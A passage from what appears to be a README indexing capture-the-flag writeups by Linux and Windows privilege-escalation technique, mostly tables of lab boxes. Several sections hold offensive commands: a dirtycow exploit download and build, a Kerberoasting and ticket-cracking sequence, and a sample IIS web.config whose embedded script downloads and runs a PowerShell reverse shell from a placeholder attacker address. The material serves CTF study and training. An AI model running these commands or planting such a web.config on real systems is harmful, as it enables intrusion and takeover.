[`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | | 3. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 4. | [Billy Madison: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf) | [vh#161](https://www.vulnhub.com/entry/billy-madison-11,161/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png" width="100" height="100" /> | [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="privesc_cron_rootjobs"></a> #### privesc_cron_rootjobs [⇡](#privesc) it would be useful to find `root` owned cronjob processes ```shell pspy # find root owned processes, cronjobs find / -type f -mmin -60 -ls 2>/dev/null # look for recently modified files since a user may not be able to see cron jobs by root ./CheckcronJob.sh # find background processes ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf) | [htb#118](https://www.hackthebox.eu/home/machines/profile/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) | [+] https://www.reddit.com/r/oscp/comments/gb4k83/htb_bashed_and_my_learnings_oscp_journey/ --- <a name="privesc_ctf_usertxt_timestamp"></a> #### privesc_ctf_usertxt_timestamp [⇡](#privesc) a neat trick for ctf boxes is to use `user.txt` file time as a reference to search for recently modified files ```shell ls -lh /home/<username>/user.txt ``` [+] https://0x00sec.org/t/enumeration-for-linux-privilege-escalation/1959/19 --- <a name="privesc_dirtycow"></a> #### privesc_dirtycow [⇡](#privesc) race condition that allows breakage of private read-only memory mappings ```shell wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c gcc -pthread -o dc dc.c -lcrypt ./dc ``` [+] https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs --- <a name="privesc_docker_group"></a> #### privesc_docker_group [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) | --- <a name="privesc_env_relative_path"></a> #### privesc_env_relative_path [⇡](#privesc) certain files when referenced without their complete path, can be misused to gain elevated privileges. this can be done by modifying the environment path to find the referenced file within a directory under attacker's control and placing a malicious binary within that directory with the same name as the referenced file | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Year of the Fox](https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf) | [tryhackme#yotf](https://tryhackme.com/room/yotf) | <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path) | [+] https://muirlandoracle.co.uk/2020/05/30/year-of-the-fox-write-up/ --- <a name="privesc_freebsd"></a> #### privesc_freebsd [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: 2014 (#5)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf) | [vh#62](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png" width="100" height="100" /> | [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd) | --- <a name="privesc_iis_webconfig"></a> #### privesc_iis_webconfig [⇡](#privesc) on iis servers, the web.config file stores configuration data for web applications (similar to .htaccess on apacher server). it can contain asp code which will be executed by the web server. use the powershell reverse shell from [nishang framework](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) to get a call back from uploaded web.config file ```shell sample web.config: <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> <%@ Language=VBScript %> <% call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('<attackerip>/Invoke-PowerShellTcp.ps1')") %> ``` [+] https://0xdf.gitlab.io/2018/10/27/htb-bounty.html --- <a name="privesc_kerberos_kerberosting"></a> #### privesc_kerberos_kerberosting [⇡](#privesc) allows us to extract administrator tickets and crack those to obtain administrator password ```shell # add entry for target system within /etc/hosts GetUserSPNs.py -request active.htb/SVC_TGS -outputfile ./adminticket john --format=krb5tgs --wordlist /usr/share/wordlists/rockyou.txt ./adminticket # does not work on john v1.8.0.6-jumbo-1-bleeding psexec.py administrator@active.htb ``` [+] https://0xrick.github.io/hack-the-box/active/ [+] https://room362.com/post/2016/kerberoast-pt1/ [+] https://room362.com/post/2016/kerberoast-pt2/ [+] https://room362.com/post/2016/kerberoast-pt3/ --- <a name="privesc_kernel_ipappend"></a> #### privesc_kernel_ipappend [⇡](#privesc) Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5/4.8 / Fedora Core 4/5/6 x86) ```shell gcc -m32 -o exploit 9542.c -Wl,--hash-style=both ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1.1 (#2)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf) | [vh#23](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend) | [+] https://www.exploit-db.com/exploits/9542 [+] https://nvd.nist.gov/vuln/detail/CVE-2009-2698 --- <a name="privesc_kernel_overlayfs"></a> #### privesc_kernel_overlayfs [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | --- <a name="privesc_lxc_bash"></a> #### privesc_lxc_bash [⇡](#privesc) ```shell check output of id command if user is member of lxd group, follow https://reboare.github.io/lxd/lxd-escape.html ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [InfoSec Prep: OSCP](https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf) | [vh#508](https://www.vulnhub.com/entry/infosec-prep-oscp,508/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash) | --- <a name="privesc_modssl"></a> #### privesc_modssl [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1 (#1)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/writeup.pdf) | [vh#22](https://www.vulnhub.com/entry/kioptrix-level-1-1,22/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/killchain.png" width="100" height="100" /> | [`exploit_modssl`](https://github.com/7h3rAm/writeups#exploit_modssl), [`privesc_modssl`](https://github.com/7h3rAm/writeups#privesc_modssl) | --- <a name="privesc_mysql_creds"></a> #### privesc_mysql_creds [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | | 2. | [Escalate_Linux: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf) | [vh#323](https://www.vulnhub.com/entry/escalate_linux-1,323/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png" width="100" height="100" /> | [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 3. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | --- <a name="privesc_mysql_root"></a> #### privesc_mysql_root [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 2. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | --- <a name="privesc_mysql_udf"></a> #### privesc_mysql_udf [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 2. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | --- <a name="privesc_nfs_norootsquash"></a> #### privesc_nfs_norootsquash [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) | --- <a name="privesc_nmap"></a> #### privesc_nmap [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Mr-Robot: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf) | [vh#151](https://www.vulnhub.com/entry/mr-robot-1,151/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png" width="100" height="100" /> | [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 2. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | --- <a name="privesc_passwd_writable"></a> #### privesc_passwd_writable [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100" /> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) | --- <a name="privesc_psexec_login"></a> #### privesc_psexec_login [⇡](#privesc) If credentials for an administrative user are available, we can use `psexec.py` to connect and gain elevated access to the target system. ```shell psexec <username>@<targetip> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#archetype](https://www.hackthebox.eu/home/start) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="privesc_setuid"></a> #### privesc_setuid [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100" /> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 2. | [Mr-Robot: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf) | [vh#151](https://www.vulnhub.com/entry/mr-robot-1,151/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png" width="100" height="100" /> | [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 3. | [hackme: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf) | [vh#330](https://www.vulnhub.com/entry/hackme-1,330/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 4. | [Escalate_Linux: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf) | [vh#323](https://www.vulnhub.com/entry/escalate_linux-1,323/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png" width="100" height="100" /> | [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 5. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 6. | [Billy Madison: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf) | [vh#161](https://www.vulnhub.com/entry/billy-madison-11,161/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png" width="100" height="100" /> | [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="privesc_shell_escape"></a> #### privesc_shell_escape [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | --- <a name="privesc_ssh_authorizedkeys"></a> #### privesc_ssh_authorizedkeys [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) | --- <a name="privesc_ssh_knownhosts"></a> #### privesc_ssh_knownhosts [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Moria: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/writeup.pdf) | [vh#187](https://www.vulnhub.com/entry/moria-11,187/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/killchain.png" width="100" height="100" /> | [`privesc_ssh_knownhosts`](https://github.com/7h3rAm/writeups#privesc_ssh_knownhosts) | --- <a name="privesc_strace_setuid"></a> #### privesc_strace_setuid [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) | --- <a name="privesc_sudo"></a> #### privesc_sudo [⇡](#privesc) using `sudo` to execute programs that run with elevated privileges | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf) | [htb#118](https://www.hackthebox.eu/home/machines/profile/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) | | 2. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 3. | [Kioptrix: Level 1.2 (#3)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf) | [vh#24](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png" width="100" height="100" /> | [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 4. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | 